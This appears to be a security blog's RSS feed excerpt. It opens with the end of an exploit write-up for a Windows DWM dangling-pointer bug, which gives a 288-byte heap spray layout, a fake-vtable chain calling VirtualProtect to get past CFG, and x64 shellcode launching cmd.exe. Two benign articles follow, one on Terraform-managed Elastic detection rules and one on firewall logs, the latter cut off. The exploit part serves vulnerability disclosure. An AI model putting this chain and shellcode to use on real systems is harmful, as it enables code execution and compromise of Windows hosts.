<li><code>[this+0x10]</code> = <code>[base+0x90]</code> = <code>base+0xA0</code> (fake_obj_2)</li>
<li><code>[RCX]</code> = <code>[base+0xA0]</code> = <code>base+0xA8</code>, fake_obj_2's vtable pointer (after fixup)</li>
<li><code>[RAX+0x10]</code> = <code>[base+0xB8]</code> = <code>base+0xD0</code>, vtable_2's third entry, pointing at our shellcode</li>
</ol>
<p>The final <code>CALL guard_dispatch_icall</code> dispatches to <code>base+0xD0</code>, our inline shellcode, now both executable and CFG-valid thanks to the preceding VirtualProtect call.</p>
<h5>Shellcode Layout</h5>
<p>The shellcode is split into two phases because the VirtualProtect address data sits at <code>+0xE8</code> (used as <code>vtable_1[0x20]</code> by call #1), creating a gap in the middle of our executable region:</p>
<p><strong>Phase 1 (+0xD0, 22 bytes):</strong> Saves <code>RCX</code> (base+0xA0) into <code>RBX</code> for later address arithmetic, allocates shadow space, loads <code>SW_SHOW</code> (5) into <code>RDX</code>, loads the absolute address of <code>WinExec</code> via <code>movabs RAX</code>, then jumps over the 8-byte data gap at <code>+0xE8</code>:</p>
<pre><code>mov  rbx, rcx              ; save base+0xA0 for address math
sub  rsp, 0x28             ; shadow space
push 5
pop  rdx                   ; uCmdShow = SW_SHOW
movabs rax, &lt;WinExec addr&gt; ; 10-byte immediate load
jmp  +0x0A                 ; skip over +0xE8 data → land at +0xF0
</code></pre>
<p><strong>Phase 2 (+0xF0):</strong> Calls <code>WinExec</code> with a <code>RIP</code>-relative pointer to the <code>&quot;cmd.exe\0&quot;</code> string embedded at the end of the shellcode, defuses the spray for safe re-entry, then performs a stack fixup to return directly to DWM's composition loop:</p>
<pre><code>lea  rcx, [rip+0x22]      ; rcx = &amp;&quot;cmd.exe&quot;
call rax                   ; WinExec(&quot;cmd.exe&quot;, SW_SHOW)

; Defuse: rewrite fake vtable so re-entry is harmless
lea  rax, [rbx+0x78]       ; rax = address of the ret below
mov  [rbx-0x48], rax       ; [base+0x58] = ret_gadget
lea  rax, [rbx-0x98]       ; rax = base+0x08
mov  [rbx-0xA0], rax       ; [base+0x00] = base+0x08 (new fake vtable)

; Stack fixup: skip Disconnect + __fnINSTRING return frames
add  rsp, 0xB8             ; 0x28 shadow + 0x90 to unwind past intermediate frames
xor  eax, eax              ; zero return value
ret                        ; return directly to DWM composition loop
; &quot;cmd.exe\0&quot; embedded here
</code></pre>
<p>The <code>add rsp, 0xB8</code> improves reliability. A naive <code>add rsp, 0x28</code> would return into <code>CStdAsyncStubBuffer2_Disconnect</code>, which would then return into <code>__fnINSTRING</code>, which calls <code>NtCallbackReturn</code>. This kernel callback return path can be fragile in the context of a hijacked call. By adding an extra <code>0x90</code> to the stack adjustment, the shellcode skips past both intermediate frames entirely and returns directly to <code>DirtyActiveInk</code>'s caller in the DWM composition loop.</p>
<h4>Safe Re-entry: Defusing the Spray</h4>
<p>DWM's <code>DirtyActiveInk</code> may iterate the dangling pointer more than once. Without defusing, each re-entry would re-trigger the full chain and crash. The shellcode rewrites the spray's vtable pointer so that subsequent dereferences take a harmless path:</p>
<ol>
<li><code>[base+0x00]</code> is overwritten to <code>base+0x08</code> (new fake vtable)</li>
<li><code>[base+0x58]</code> is overwritten to the address of a <code>ret</code> instruction</li>
</ol>
<p>On re-entry: <code>[[base+0x00]+0x50] = [base+0x08+0x50] = [base+0x58] = ret</code>. The vtable call returns immediately. <code>__fnINSTRING</code> is never re-invoked because the vtable no longer points at the KCT entry.</p>
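<p>The defused pointer chain can be checked with a small model: once <code>[base+0x00]</code> holds <code>base+0x08</code>, the virtual slot read at <code>+0x50</code> lands on <code>[base+0x58]</code> (the gadget address below is a placeholder):</p>
<pre><code class="language-c">#include &lt;stdint.h&gt;

/* Model the virtual dispatch: fn = [[base+0x00]+0x50]. */
static uint64_t resolve_vcall_slot(uint64_t *base) {
    uint64_t vtbl = base[0];                        /* [base+0x00] */
    return *(uint64_t *)(uintptr_t)(vtbl + 0x50);   /* [vtbl+0x50] */
}

uint64_t demo_defused_dispatch(void) {
    static uint64_t spray[36] = {0};                /* 288 bytes, 8-byte slots */
    uint64_t ret_gadget = 0x4141414141414141ULL;    /* placeholder address */
    spray[0x00 / 8] = (uint64_t)(uintptr_t)spray + 0x08; /* defused fake vtable */
    spray[0x58 / 8] = ret_gadget;                   /* slot hit on re-entry */
    return resolve_vcall_slot(spray);
}
</code></pre>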
<h3>Complete Spray Layout</h3>
<p>The full 288-byte spray buffer (18 RECTs) after <code>FixupCallbackPointers</code>:</p>
<table>
<thead>
<tr>
<th align="left">Offset</th>
<th align="left">Size</th>
<th align="left">Content</th>
<th align="left">Purpose</th>
</tr>
</thead>
<tbody>
<tr>
<td align="left">+0x00</td>
<td align="left">8</td>
<td align="left">KCT_entry - 0x50</td>
<td align="left">Fake vtable → <code>__fnINSTRING</code></td>
</tr>
<tr>
<td align="left">+0x08</td>
<td align="left">4</td>
<td align="left">8</td>
<td align="left">Fixup count</td>
</tr>
<tr>
<td align="left">+0x18</td>
<td align="left">4</td>
<td align="left">0x58</td>
<td align="left">Fixup table offset</td>
</tr>
<tr>
<td align="left">+0x20</td>
<td align="left">8</td>
<td align="left">base (fixup'd)</td>
<td align="left">Guard (blocks re-fixup)</td>
</tr>
<tr>
<td align="left">+0x28</td>
<td align="left">8</td>
<td align="left">base+0x80 (fixup'd)</td>
<td align="left">RCX → Disconnect <code>this</code></td>
</tr>
<tr>
<td align="left">+0x30</td>
<td align="left">4</td>
<td align="left">0x1000</td>
<td align="left">EDX → VirtualProtect <code>dwSize</code></td>
</tr>
<tr>
<td align="left">+0x38</td>
<td align="left">8</td>
<td align="left">0x40</td>
<td align="left">R8 → PAGE_EXECUTE_READWRITE</td>
</tr>
<tr>
<td align="left">+0x48</td>
<td align="left">8</td>
<td align="left">&amp;Disconnect</td>
<td align="left">Inner function pointer</td>
</tr>
<tr>
<td align="left">+0x50</td>
<td align="left">8</td>
<td align="left">base+0xC0 (fixup'd)</td>
<td align="left">R9 → <code>lpflOldProtect</code></td>
</tr>
<tr>
<td align="left">+0x58</td>
<td align="left">32</td>
<td align="left">fixup table (8 entries)</td>
<td align="left">Offsets to patch</td>
</tr>
<tr>
<td align="left">+0x78</td>
<td align="left">8</td>
<td align="left">base+0xC8 (fixup'd)</td>
<td align="left">[this-8] → fake_obj_1</td>
</tr>
<tr>
<td align="left">+0x80</td>
<td align="left">8</td>
<td align="left">(unused)</td>
<td align="left">Disconnect <code>this</code> base</td>
</tr>
<tr>
<td align="left">+0x90</td>
<td align="left">8</td>
<td align="left">base+0xA0 (fixup'd)</td>
<td align="left">[this+0x10] → fake_obj_2</td>
</tr>
<tr>
<td align="left">+0xA0</td>
<td align="left">8</td>
<td align="left">base+0xA8 (fixup'd)</td>
<td align="left">fake_obj_2 vtable</td>
</tr>
<tr>
<td align="left">+0xB8</td>
<td align="left">8</td>
<td align="left">base+0xD0 (fixup'd)</td>
<td align="left">vtable_2[0x10] → shellcode</td>
</tr>
<tr>
<td align="left">+0xC0</td>
<td align="left">4</td>
<td align="left">(output)</td>
<td align="left">VirtualProtect <code>lpflOldProtect</code></td>
</tr>
<tr>
<td align="left">+0xC8</td>
<td align="left">8</td>
<td align="left">base+0xC8 (fixup'd)</td>
<td align="left">Self-referential vtable (fake_obj_1)</td>
</tr>
<tr>
<td align="left">+0xD0</td>
<td align="left">22</td>
<td align="left">shellcode phase 1</td>
<td align="left">Save regs, load WinExec, jmp</td>
</tr>
<tr>
<td align="left">+0xE8</td>
<td align="left">8</td>
<td align="left">&amp;VirtualProtect</td>
<td align="left">vtable_1[0x20] data</td>
</tr>
<tr>
<td align="left">+0xF0</td>
<td align="left">48</td>
<td align="left">shellcode phase 2</td>
<td align="left">WinExec + defuse + stack fixup + &quot;cmd.exe\0&quot;</td>
</tr>
</tbody>
</table>
<h3>Full Chain Summary</h3>
<pre><code>DirtyActiveInk iterates dangling pointer
  → [[spray+0x00]+0x50] = __fnINSTRING(spray)
    → FixupCallbackPointers: 8 relative offsets → absolute
    → Dispatch: CStdAsyncStubBuffer2_Disconnect(base+0x80, 0x1000, 0x40, base+0xC0)
      → Vtable call #1: VirtualProtect(base+0xC8, 0x1000, RWX, base+0xC0)
        → Spray buffer page is now RWX, CFG bitmap updated
      → Vtable call #2: shellcode at base+0xD0
        → WinExec(&quot;cmd.exe&quot;, SW_SHOW)
        → Defuse: rewrite vtable for safe re-entry
        → Stack fixup: add rsp, 0xB8 to skip Disconnect + __fnINSTRING frames
      → RET directly to DWM composition loop
    → DirtyActiveInk re-entry: [[base]+0x50] = ret → clean return
</code></pre>
<p>The DWM process runs as the DWM user with System integrity. Prior <a href="https://ti.qianxin.com/blog/articles/public-secret-research-on-the-cve-2024-30051-privilege-escalation-vulnerability-in-the-wild-en/">public techniques</a> to achieve SYSTEM typically involve hijacking function pointers mapped into privileged client processes like LogonUI or Consent. However, it appears this technique was recently patched as the shared section is now mapped read-only. We developed a new, alternative path to SYSTEM but are choosing to withhold publishing the technique at this time.</p>
<div class="youtube-video-container">
  <iframe src="https://www.youtube.com/embed/SR4242l_kw0?si=lIQFQ8xThl_Nmt0w" title="YouTube video player" allow="fullscreen; accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen></iframe>
</div>
<h2>Closing Thoughts</h2>
<p>The models we have today are highly capable at tasks that have historically required deep expertise cultivated over many years, including reverse engineering, vulnerability discovery, and exploit development. Their capabilities are spiky and do not yet rival the world's best in these fields, but the march of model progress shows no sign of slowing down.</p>
<p>This levels the playing field for defenders, but it also raises the capabilities of attackers. The adversarial cat-and-mouse game is nothing new, yet attackers hold a near-term asymmetric advantage: they can move faster, with little concern for the safety or security of AI systems. Defenders must turn AI against their own code (for vulnerabilities), their security products (for detection gaps), and their enterprises (adversary emulation) to find weaknesses and iterate on improved defenses before attackers do. Unfortunately, it may be the small organizations with no security teams that take the brunt of the near-term pain.</p>
<p>My hope is that, long term, the security community can together outspend attackers on offensive and defensive research, and that we exit this era in a better place than we started.</p>
]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/kr/security-labs/assets/images/patch-diff-to-system/patch-diff-to-system.png" length="0" type="image/png"/>
        </item>
        <item>
            <title><![CDATA[Manage your Elastic security stack as code with the Elastic Stack Terraform provider]]></title>
            <link>https://www.elastic.co/kr/security-labs/manage-elastic-with-terraform</link>
            <guid>manage-elastic-with-terraform</guid>
            <pubDate>Fri, 27 Feb 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[From detection rules to AI connectors - the latest Terraform provider releases bring security, observability, and ML capabilities to your infrastructure-as-code workflows.]]></description>
            <content:encoded><![CDATA[<p>The <a href="https://registry.terraform.io/providers/elastic/elasticstack/latest/docs">Elastic Stack Terraform provider</a> has reached a significant milestone. Starting with release v0.13.1, you can manage your Elastic security posture - detection rules, exception lists, and prebuilt rules - alongside ML anomaly detection jobs, synthetics monitors, and AI connectors, all as code.</p>
<p>This brings your detection logic and ML jobs into the same versioned, peer-reviewed workflow as your core clusters. It ensures your security posture and AI connectors are no longer manual outliers in an otherwise automated environment.</p>
<h2>The challenge: Security and observability configuration at scale</h2>
<p>As Elastic deployments grow, so does the complexity of managing them. Security teams maintain hundreds of detection rules. SREs configure monitoring across dozens of clusters. ML engineers tune anomaly detection jobs across multiple environments. All of these configurations must be consistent, auditable, and reproducible.</p>
<p>Without infrastructure as code, teams face two problems:</p>
<ol>
<li>
<p><strong>Configuration drift.</strong> Rules, policies, and monitors are created manually through the Kibana UI. Over time, production and staging diverge. No one is sure which version of a detection rule is running where.</p>
</li>
<li>
<p><strong>Buried audit trail.</strong> When a detection rule changes or an exception is added, there's no pull request to review, no commit history to trace, and no rollback path if something breaks. Reconstructing what changed, and when, takes significant manual effort.</p>
</li>
</ol>
<p>The <a href="https://registry.terraform.io/providers/elastic/elasticstack/latest/docs">Elastic Stack Terraform provider</a> solves this by bringing these configurations into the same version-controlled, peer-reviewed workflow that teams already use for infrastructure.</p>
<h2>Security artifacts as code: Detection rules, exceptions, and prebuilt rules</h2>
<p>You can now manage the full lifecycle of Elastic Security detection rules through Terraform.</p>
<h3>Detection rules</h3>
<p>The <code>elasticstack_kibana_security_detection_rule</code> resource lets you define, version, and deploy detection rules in the <a href="https://github.com/hashicorp/hcl">HashiCorp Configuration Language</a> (HCL) format:</p>
<pre><code>resource &quot;elasticstack_kibana_security_detection_rule&quot; &quot;suspicious_admin_logon&quot; {
  name        = &quot;Suspicious Admin Logon Activity&quot;
  type        = &quot;query&quot;
  query       = &quot;event.action:logon AND user.name:admin&quot;
  language    = &quot;kuery&quot;
  enabled     = true
  description = &quot;Detects suspicious admin logon activities&quot;
  severity    = &quot;high&quot;
  risk_score  = 75
  from        = &quot;now-6m&quot;
  to          = &quot;now&quot;
  interval    = &quot;5m&quot;
  tags        = [&quot;security&quot;, &quot;authentication&quot;, &quot;admin&quot;]
}
</code></pre>
<p>This means your detection rules live in Git, undergo code review, and are deployed consistently across environments. No more clicking through the Kibana UI to replicate rules from staging to production.</p>
<p><a href="https://registry.terraform.io/providers/elastic/elasticstack/latest/docs/resources/kibana_security_detection_rule">Detection rule resource docs</a></p>
<h3>Exception lists and items</h3>
<p>The security-as-code story extends to a full suite of exception management resources:</p>
<ul>
<li><code>elasticstack_kibana_security_exception_list</code> - Create and manage exception lists</li>
<li><code>elasticstack_kibana_security_exception_item</code> - Define individual exception items within a list</li>
<li><code>elasticstack_kibana_security_list</code> and <code>elasticstack_kibana_security_list_item</code> - Manage value lists for IP allowlists, file hashes, and other indicators</li>
<li><code>elasticstack_kibana_security_list_data_streams</code> - Associate lists with specific data streams</li>
</ul>
<p>Here's an example that ties them together - an exception list with items that suppress known false positives for a detection rule:</p>
<pre><code>resource &quot;elasticstack_kibana_security_exception_list&quot; &quot;vuln_scanner_exceptions&quot; {
  list_id        = &quot;vuln-scanner-exceptions&quot;
  name           = &quot;Vulnerability Scanner Exceptions&quot;
  description    = &quot;Suppress alerts from authorized vulnerability scanners&quot;
  type           = &quot;detection&quot;
  namespace_type = &quot;single&quot;
  tags           = [&quot;security&quot;, &quot;vulnerability-scanning&quot;]
}

resource &quot;elasticstack_kibana_security_exception_item&quot; &quot;nessus_scanner&quot; {
  list_id        = elasticstack_kibana_security_exception_list.vuln_scanner_exceptions.list_id
  item_id        = &quot;nessus-scanner&quot;
  name           = &quot;Nessus Scanner - Authorized&quot;
  description    = &quot;Suppress alerts from authorized Nessus scanner hosts&quot;
  type           = &quot;simple&quot;
  namespace_type = &quot;single&quot;

  entries = [
    {
      type     = &quot;match&quot;
      field    = &quot;source.ip&quot;
      operator = &quot;included&quot;
      value    = &quot;10.0.50.10&quot;
    },
    {
      type     = &quot;match_any&quot;
      field    = &quot;process.name&quot;
      operator = &quot;included&quot;
      values   = [&quot;nessus&quot;, &quot;nessusd&quot;]
    }
  ]

  tags = [&quot;nessus&quot;, &quot;authorized-scanner&quot;]
}

resource &quot;elasticstack_kibana_security_exception_item&quot; &quot;qualys_scanner&quot; {
  list_id        = elasticstack_kibana_security_exception_list.vuln_scanner_exceptions.list_id
  item_id        = &quot;qualys-scanner&quot;
  name           = &quot;Qualys Scanner - Authorized&quot;
  description    = &quot;Suppress alerts from authorized Qualys scanner subnet&quot;
  type           = &quot;simple&quot;
  namespace_type = &quot;single&quot;

  entries = [
    {
      type     = &quot;match&quot;
      field    = &quot;source.ip&quot;
      operator = &quot;included&quot;
      value    = &quot;10.0.51.0/24&quot;
    }
  ]

  tags = [&quot;qualys&quot;, &quot;authorized-scanner&quot;]
}
</code></pre>
<p>The exception list and its items are linked by <code>list_id</code>, so Terraform manages the dependency graph automatically. Adding a new authorized scanner is a one-line PR - no clicking through the Kibana UI, no risk of forgetting which environment got the update.</p>
<h3>Prebuilt security rules</h3>
<p>The <code>elasticstack_kibana_prebuilt_rule</code> resource lets you manage Elastic's prebuilt detection rules via Terraform. This is particularly valuable for organizations that need to track which prebuilt rules are enabled, customize their parameters, and ensure consistent deployment across environments.</p>
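<p>A minimal sketch of what this can look like is below. Treat the attribute names as an illustration rather than a definitive schema - consult the resource's page in the provider documentation for the exact arguments it accepts:</p>
<pre><code># Hedged sketch: rule_id and enabled are assumed attribute names
resource &quot;elasticstack_kibana_prebuilt_rule&quot; &quot;example&quot; {
  # Identifier of the Elastic prebuilt rule to manage (illustrative value)
  rule_id = &quot;9a1a2dae-0b5f-4c3d-8305-a268d404c306&quot;
  enabled = true
}
</code></pre>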
<h2>ML anomaly detection as code</h2>
<p>Machine learning anomaly detection is one of Elasticsearch's most powerful capabilities - but managing ML jobs across environments has traditionally been a manual process. You create a job in the Kibana UI, tune the detectors, configure the datafeed, and hope someone documents the settings so they can be replicated in the next environment.</p>
<p>The <code>elasticstack_elasticsearch_ml_anomaly_detection_job</code> resource changes that. You can now define the full configuration of an anomaly detection job in HCL - detectors, bucket spans, influencers, data feeds, and analysis limits - and deploy it consistently across dev, staging, and production.</p>
<pre><code>resource &quot;elasticstack_elasticsearch_ml_anomaly_detection_job&quot; &quot;cpu_anomalies&quot; {
  job_id      = &quot;high-cpu-by-host&quot;
  description = &quot;Detect unusual CPU usage patterns&quot;

  analysis_config = {
    bucket_span = &quot;15m&quot;
    detectors   = [{
      function   = &quot;high_mean&quot;
      field_name = &quot;system.cpu.user_pct&quot;
    }]
    influencers = [&quot;host.name&quot;]
  }

  data_description = {
    time_field = &quot;@timestamp&quot;
  }
}
</code></pre>
<p>This matters for teams that rely on ML to catch infrastructure anomalies, unusual user behavior, or security threats. Instead of manually recreating jobs when spinning up new clusters or recovering from failures, the entire ML configuration lives in version control - reviewable, repeatable, and recoverable.</p>
<h2>Cross-cluster automation with API keys</h2>
<p>For organizations running multiple Elasticsearch clusters, the provider now supports <strong>cluster API keys for cross-cluster search (CCS) and cross-cluster replication (CCR)</strong>. You can create API keys specifically designed for secure cross-cluster communication, enabling end-to-end automation of multi-cluster architectures.</p>
<p>This means you can provision two clusters, configure CCS/CCR between them, and set up the necessary security credentials - all in a single Terraform configuration.</p>
<pre><code>resource &quot;elasticstack_elasticsearch_security_api_key&quot; &quot;ccs_key&quot; {
  name = &quot;cross-cluster-search-key&quot;
  type = &quot;cross_cluster&quot;

  access = {
    search = [{
      names = [&quot;logs-*&quot;, &quot;metrics-*&quot;]
    }]
    replication = [{
      names = [&quot;archive-*&quot;]
    }]
  }

  expiration = &quot;90d&quot;

  metadata = jsonencode({
    environment = &quot;production&quot;
    purpose     = &quot;ccs-ccr-between-prod-clusters&quot;
    team        = &quot;platform&quot;
  })
}
</code></pre>
<p>When the <code>type</code> is set to <code>cross_cluster</code>, the API key is scoped to CCS/CCR operations. You define which index patterns are accessible for search and replication, set an expiration policy, and tag the key with metadata - all reviewable in a pull request.</p>
<p>Learn more about <a href="https://registry.terraform.io/providers/elastic/elasticstack/latest/docs/resources/elasticsearch_security_api_key">API key resources</a> in the documentation.</p>
<h2>AI connectors as code</h2>
<p>The provider now supports <code>.bedrock</code> and <code>.gen-ai</code> connectors, bringing AI infrastructure into your Terraform workflows. As teams increasingly integrate large language models into their Elastic workflows - for AI assistants, attack discovery, and automated investigations - managing these connector configurations as code becomes essential.</p>
<pre><code>resource &quot;elasticstack_kibana_action_connector&quot; &quot;bedrock&quot; {
  name              = &quot;aws-bedrock&quot;
  connector_type_id = &quot;.bedrock&quot;
  config = jsonencode({
    apiUrl       = &quot;https://bedrock-runtime.us-east-1.amazonaws.com&quot;
    defaultModel = &quot;anthropic.claude-v2&quot;
  })
  secrets = jsonencode({
    accessKey = var.aws_access_key
    secret    = var.aws_secret_key
  })
}

resource &quot;elasticstack_kibana_action_connector&quot; &quot;openai&quot; {
  name              = &quot;openai&quot;
  connector_type_id = &quot;.gen-ai&quot;
  config = jsonencode({
    apiProvider  = &quot;OpenAI&quot;
    apiUrl       = &quot;https://api.openai.com/v1/chat/completions&quot;
    defaultModel = &quot;gpt-4&quot;
  })
  secrets = jsonencode({
    apiKey = var.openai_api_key
  })
}
</code></pre>
<p>With these connectors defined in Terraform, you can version your AI integration configuration alongside the rest of your Elastic infrastructure - and swap models or providers through a simple PR.</p>
<h2>Observability enhancements</h2>
<h3>Synthetics monitors</h3>
<p>The <code>elasticstack_kibana_synthetics_monitor</code> resource now includes a <code>labels</code> field, enabling better organization and filtering of synthetic checks. Labels let you tag monitors by team, environment, or service, making it easier to manage synthetic monitoring at scale.</p>
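<p>For example - a hedged sketch in which the monitor's other arguments are abbreviated and the exact shape of the <code>labels</code> field should be checked against the resource documentation:</p>
<pre><code>resource &quot;elasticstack_kibana_synthetics_monitor&quot; &quot;checkout&quot; {
  name      = &quot;checkout-page&quot;
  space_id  = &quot;default&quot;
  schedule  = 5
  locations = [&quot;us_east&quot;]

  http = {
    url = &quot;https://example.com/checkout&quot;
  }

  # New: labels for organizing and filtering monitors
  labels = {
    team        = &quot;payments&quot;
    environment = &quot;production&quot;
  }
}
</code></pre>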
<h2>Additional platform improvements</h2>
<p>Recent releases also included several resources and attributes that round out the provider's coverage:</p>
<ul>
<li><code>elasticstack_elasticsearch_alias</code> - Manage Elasticsearch aliases as a dedicated resource</li>
<li><code>elasticstack_kibana_default_data_view</code> - Set the default data view for a Kibana space</li>
<li><code>solution</code> attribute on <code>elasticstack_kibana_space</code> - Configure the solution type for Kibana spaces (available from 8.16)</li>
<li>Fleet agent policy enhancements - <code>host_name_format</code> for configuring hostname vs. FQDN, and <code>required_versions</code> for version pinning</li>
</ul>
<h2>Getting started</h2>
<p>If you're already using the Elastic Stack Terraform provider, upgrade to the latest provider version to get all of these capabilities:</p>
<pre><code>terraform {
  required_providers {
    elasticstack = {
      source  = &quot;elastic/elasticstack&quot;
      version = &quot;~&gt; 0.14&quot;
    }
  }
}
</code></pre>
<p>If you're new to managing your Elastic Stack with Terraform, start with the <a href="https://registry.terraform.io/providers/elastic/elasticstack/latest/docs">provider documentation</a> on the Terraform registry.</p>
<p>To start using Elastic Cloud today, log in to the <a href="https://cloud.elastic.co/">Elastic Cloud console</a> or sign up for a <a href="https://cloud.elastic.co/registration">free trial</a>.<br />
For the full set of changes, check out the <a href="https://github.com/elastic/terraform-provider-elasticstack/releases">release notes on GitHub</a>.</p>
]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/kr/security-labs/assets/images/manage-elastic-with-terraform/manage-elastic-with-terraform.png" length="0" type="image/png"/>
        </item>
        <item>
            <title><![CDATA[Make The Most of Network Firewall Logs with Elastic Security]]></title>
            <link>https://www.elastic.co/kr/security-labs/make-the-most-of-network-firewall-logs-with-elastic</link>
            <guid>make-the-most-of-network-firewall-logs-with-elastic</guid>
            <pubDate>Wed, 25 Feb 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Make the most of your firewall logs. In Part 1 of our series, learn how to ingest and parse logs from any firewall with Elastic Agent and use the Network Page to visually explore your network traffic for instant insights.]]></description>
            <content:encoded><![CDATA[<p><em>This is Part 1 of a two-part series on leveraging firewall data in Elastic Security. In this post, we cover the fundamentals of firewall logs, how to collect them, and how to begin exploring your network data visually.</em></p>
<p>The network firewall is one of the most critical security controls in a network. It enforces security policies by inspecting and controlling traffic between network segments, while generating logs that record allowed and denied connections. This article explores why firewall logs are a valuable supplement to other data sources, such as endpoint telemetry, and provides an overview of what firewall logs contain and how security teams can use them effectively.</p>
<p>We will cover:</p>
<ul>
<li>The importance of network firewall logs</li>
<li>What’s inside network firewall logs &amp; how that data helps cybersecurity</li>
<li>Collecting network firewall logs with Elastic Agent</li>
<li>Exploring your data on the Elastic Security Network Page</li>
</ul>
<h2>The Importance of Network Firewall Logs</h2>
<p>A network firewall acts as a gatekeeper, filtering traffic based on organizational rules and policies. For instance, it might permit one system to use RDP to connect to another while blocking similar access from other systems. In cloud environments, virtual firewalls enforce security group rules, network ACLs, and policy boundaries across VPCs, subnets, and regions, thus offering visibility into east-west and north-south traffic across your cloud estate.</p>
<p>Modern firewalls go beyond traditional filtering by incorporating capabilities such as deep packet inspection, application awareness, and threat intelligence.</p>
<p>Positioned strategically, firewalls capture logs that provide insights into inter-zone and intra-zone communication. For instance:</p>
<ul>
<li><strong>North-south traffic</strong> is data movement between an internal network and external entities like the Internet or cloud services. It is typically monitored by firewalls and security controls to prevent external threats.</li>
<li><strong>East-west traffic</strong> refers to communication within a network, such as between servers, endpoints, or applications inside an organization. It is crucial for internal operations and requires lateral movement detection for security.</li>
</ul>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/make-the-most-of-network-firewall-logs-with-elastic/image2.png" alt="A classic setup of firewalls in a corporate environment" /></p>
<p>By analyzing these logs, security teams gain critical insights into traffic patterns, rule enforcement, and potential threats.</p>
<h2>What's to Look Out for in Network Firewall Logs?</h2>
<p>Firewall logs contain detailed records of network activity, packed with information useful for tracking, monitoring, and analyzing traffic patterns, as well as for identifying security events and potential threats. They capture packet filtering and traffic control decisions: allowed and denied traffic, NAT translations, and access control outcomes.</p>
<p>The following is a list of key fields that provide the &quot;ground truth&quot; for your network. Please note that the parentheses contain the equivalent ECS fields.</p>
<ul>
<li>
<p><strong>Timestamp (<em>@timestamp</em>):</strong> This is the chronological anchor of firewall logs. It helps analysts correlate sequences of events across different devices and networks. For example, if an analyst identifies a suspicious connection, they can trace back the actions preceding or following it to build a precise incident timeline.</p>
</li>
<li>
<p><strong>Source and Destination IP (<em>source.ip, destination.ip</em>):</strong> These identify the origin and target of the traffic. While seemingly simple, directionality is a critical distinction in firewall rulesets. Source IPs help identify malicious external origins or internal systems attempting brute-force attacks, while destination IPs help flag when high-value assets, such as a sensitive database, are being targeted.</p>
</li>
<li>
<p><strong>Source and Destination Port (<em>source.port, destination.port</em>):</strong> Attackers often target specific services. While source ports are often dynamic, destination ports tell you what service is being probed. High-frequency connections to common services (like 80/HTTP or 443/HTTPS) or high-risk ports (like 22/SSH) can be the first indicator of unauthorized access or web-based attacks.</p>
</li>
<li>
<p><strong>Protocol (<em>network.transport</em>):</strong> Analyzing usage of protocols like TCP, UDP, or ICMP helps identify specific attack types. For instance, unusual ICMP patterns might signal a ping sweep or a denial-of-service (DoS) attempt.</p>
</li>
<li>
<p><strong>Action and Rule Identifiers (<em>event.action or event.outcome, rule.name or rule.id</em>):</strong> Understanding whether a firewall allowed or blocked a connection is vital. By identifying the specific <strong>Rule Identifier</strong>, analysts can see which policy was responsible. This is essential for finding misconfigured rules that might be unintentionally exposing the network to attacks.</p>
</li>
<li>
<p><strong>Traffic Volume (<em>source.bytes, destination.bytes, network.bytes</em>):</strong> These fields are primary indicators for data exfiltration. Sudden spikes in volume or large transfers to an external destination are often the &quot;early warning&quot; for data theft or malware beaconing.</p>
</li>
<li>
<p><strong>NAT Info (<em>source.nat.ip, destination.nat.ip</em>):</strong> In complex environments where Network Address Translation (NAT) is involved, these fields are crucial for &quot;unmasking&quot; the actual internal systems involved. Without this, tracing a suspicious connection back to a specific internal host can be nearly impossible. This is especially important for north-south traffic.</p>
</li>
<li>
<p><strong>Application Info (<em>network.application</em>):</strong> Next-Generation Firewalls (NGFWs) go beyond ports to identify the actual application (e.g., Skype, BitTorrent, or HTTP). This allows analysts to detect unauthorized applications that might be masking their traffic on standard ports, signaling potential insider threats, lateral movement, or the use of high-risk peer-to-peer software.</p>
</li>
<li>
<p><strong>Interface Info (<em>observer.ingress.interface.name, observer.egress.interface.name</em>):</strong> Knowing which physical or virtual interface the traffic passed through (e.g., WAN vs. LAN) helps analysts understand which network segments are involved. Traffic crossing internal interfaces is a key indicator of malware propagation or lateral movement.</p>
</li>
</ul>
<p><strong>Note</strong>: Some <a href="https://www.elastic.co/kr/docs/reference/integrations">integrations</a> might have these fields labeled differently.</p>
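<p>Put together, a single parsed firewall event might look like the following ECS document (illustrative values only):</p>
<pre><code>{
  &quot;@timestamp&quot;: &quot;2026-02-25T09:14:03.000Z&quot;,
  &quot;event&quot;: { &quot;category&quot;: [&quot;network&quot;], &quot;action&quot;: &quot;denied&quot; },
  &quot;rule&quot;: { &quot;id&quot;: &quot;104&quot;, &quot;name&quot;: &quot;block-inbound-ssh&quot; },
  &quot;source&quot;: { &quot;ip&quot;: &quot;203.0.113.50&quot;, &quot;port&quot;: 51844, &quot;bytes&quot;: 420 },
  &quot;destination&quot;: { &quot;ip&quot;: &quot;10.0.10.25&quot;, &quot;port&quot;: 22, &quot;bytes&quot;: 0 },
  &quot;network&quot;: { &quot;transport&quot;: &quot;tcp&quot;, &quot;bytes&quot;: 420 },
  &quot;observer&quot;: { &quot;ingress&quot;: { &quot;interface&quot;: { &quot;name&quot;: &quot;wan1&quot; } } }
}
</code></pre>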
<h2>Collecting firewall logs with Elastic Security</h2>
<p>Elastic makes it easy to collect network firewall logs. This guide describes how to use Elastic Agent and Fleet for firewall log collection. There are other ways to collect network logs with Elastic, such as using <a href="https://www.elastic.co/kr/logstash">Logstash</a>. In cloud environments, you can also ingest logs directly from object storage (like AWS S3 or Azure Blob). This approach is useful for environments where firewalls log to a centralized store rather than stream data directly.</p>
<p>To effectively collect and analyze network firewall logs using Elastic Security, follow these steps:</p>
<ol>
<li><strong>Configure Log Forwarding:</strong> Set up your firewall to forward logs to Elastic Agent.</li>
<li><strong>Syslog Configuration (or similar):</strong> Typically, you will direct your firewall to send Syslog data to the host that has the Elastic Agent, specifying the appropriate IP address and port.</li>
<li><strong>Elastic Agent Setup:</strong> Install and configure Elastic Agent on a syslog server, edge server, or similar log collector to receive and process the logs.</li>
<li><strong>Utilize the relevant Elastic Integrations:</strong> Elastic offers integrations tailored for various firewalls, such as:
<ul>
<li>Palo Alto Next-Gen firewall</li>
<li>Fortinet FortiGate firewall</li>
<li>Check Point</li>
<li>Cisco ASA</li>
<li>AWS Network Firewall</li>
<li>Azure Firewall</li>
